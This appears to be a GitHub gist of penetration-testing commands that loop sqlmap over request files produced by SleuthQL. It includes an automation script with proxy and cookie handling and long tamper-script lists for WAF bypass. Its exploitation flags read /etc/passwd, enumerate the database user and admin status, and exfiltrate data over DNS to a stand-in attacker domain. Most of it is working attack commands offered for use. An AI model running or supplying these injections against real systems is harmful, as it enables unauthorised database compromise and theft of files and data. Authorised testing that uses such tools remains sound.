@hoodoer
Last active September 20, 2024 15:09
SleuthQL Loop, commands to use the output from sleuthQL.
sleuthql.py -d domainname -f proxyHistory.xml
for i in ./*.txt; do sqlmap -r "$i" --batch; done
Forcing https/ssl:
--force-ssl
Random user agent:
--random-agent
Proxy:
--proxy="socks5://127.0.0.1:8082"
With counter (count only the .txt request files; a bare `ls -1 | wc -l` also counts sqlmap's output and anything else sitting in the directory):
COUNTER=1; TOTAL=$(ls -1 *.txt | wc -l); for i in *.txt; do echo "$COUNTER/$TOTAL"; COUNTER=$((COUNTER+1)); sqlmap -r "$i" --batch --threads 5; done
With counter and proxy:
COUNTER=1; TOTAL=$(ls -1 *.txt | wc -l); for i in *.txt; do echo "$COUNTER/$TOTAL"; COUNTER=$((COUNTER+1)); sqlmap -r "$i" --proxy="http://localhost:8080" --batch --threads 5; done
With proxy, session cookies, random user agent and forced SSL (pass all cookies in one --cookie string; if --cookie is given twice, sqlmap keeps only the last value):
for i in *.txt; do sqlmap -r "$i" --proxy="http://localhost:8080" --batch --cookie="JSESSIONID=XYZBBQSAUCE; CASessionId=ANOTHERCOOKIE" --random-agent --force-ssl --threads 5; done
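The loop, counter, proxy and cookie options above, combined into one reusable script. This is an added example, not code from the gist: it assumes sqlmap is on PATH, that SleuthQL wrote one request file per candidate as *.txt into the directory you pass, and the proxy, cookie and DBMS values are placeholders you replace (or export) before running.

```shell
#!/bin/sh
# sleuthql_loop.sh: added example, not part of the original gist.
# Runs sqlmap against every SleuthQL request file (*.txt) in a directory with a
# "n/total" counter and a per-request log. Assumes sqlmap is on PATH; the proxy,
# cookie and DBMS values below are placeholders.
PROXY="${PROXY:-}"              # e.g. http://127.0.0.1:8080 to watch the traffic in Burp
COOKIES="${COOKIES:-}"          # e.g. "JSESSIONID=XYZBBQSAUCE; CASessionId=ANOTHERCOOKIE"
DBMS="${DBMS:-}"                # e.g. mssql, only when the backend is already known
THREADS="${THREADS:-5}"
SQLMAP="${SQLMAP:-sqlmap}"      # overridable (e.g. SQLMAP=echo) for a dry run

# Sorted list of request files in $1; prints nothing when the glob matches no file.
list_requests() {
  for f in "$1"/*.txt; do
    [ -f "$f" ] && printf '%s\n' "$f"
  done | sort
}

# Only *.txt files count: `ls -1 | wc -l` in the one-liner also counted logs and
# anything else in the directory.
count_requests() {
  list_requests "$1" | wc -l | tr -d ' '
}

# Run sqlmap on one request file. The cookie string is passed to --cookie exactly
# once: sqlmap keeps only the last value when the option is repeated.
run_one() {
  req="$1"
  set -- -r "$req" --batch --threads "$THREADS" --random-agent --force-ssl
  [ -n "$PROXY" ]   && set -- "$@" "--proxy=$PROXY"
  [ -n "$COOKIES" ] && set -- "$@" "--cookie=$COOKIES"
  [ -n "$DBMS" ]    && set -- "$@" "--dbms=$DBMS"
  "$SQLMAP" "$@" 2>&1 | tee "${req%.txt}.sqlmap.log"
}

# Loop with progress counter; returns 1 when the directory holds no request files.
run_batch() {
  dir="${1:-.}"
  total=$(count_requests "$dir")
  if [ "$total" -eq 0 ]; then
    echo "no *.txt request files in $dir" >&2
    return 1
  fi
  n=0
  list_requests "$dir" | while IFS= read -r req; do
    n=$((n + 1))
    printf '[%s/%s] %s\n' "$n" "$total" "$req"
    run_one "$req"
  done
}

# Usage: sh sleuthql_loop.sh ./requests   (no argument: only define the functions)
if [ $# -gt 0 ]; then
  run_batch "$1"
fi
```

Run it as `PROXY=http://127.0.0.1:8080 COOKIES="JSESSIONID=...; CASessionId=..." sh sleuthql_loop.sh ./requests`; each request's sqlmap output is mirrored to a `.sqlmap.log` next to it, and `SQLMAP=echo` prints the exact argument list per request without touching the target.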
Force database backend type if you know it:
--dbms mssql
Tamper scripts (everything at once; many of these are backend-specific, e.g. the space2mssql*, space2mysql*, versioned* and sp_password scripts, so this list is slow and noisy and is a last resort when the shorter general list below fails):
sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1' --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
Fewer scripts, good general:
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423
Exploitation:
--current-user --is-dba --hostname
--file-read=/etc/passwd
Don't forget DNS exfiltration for blind injections where the DB server can resolve external names: --dns-domain=attacker.example (sqlmap itself answers the DNS queries for that domain, so it must run on the host the NS record points to with port 53 free).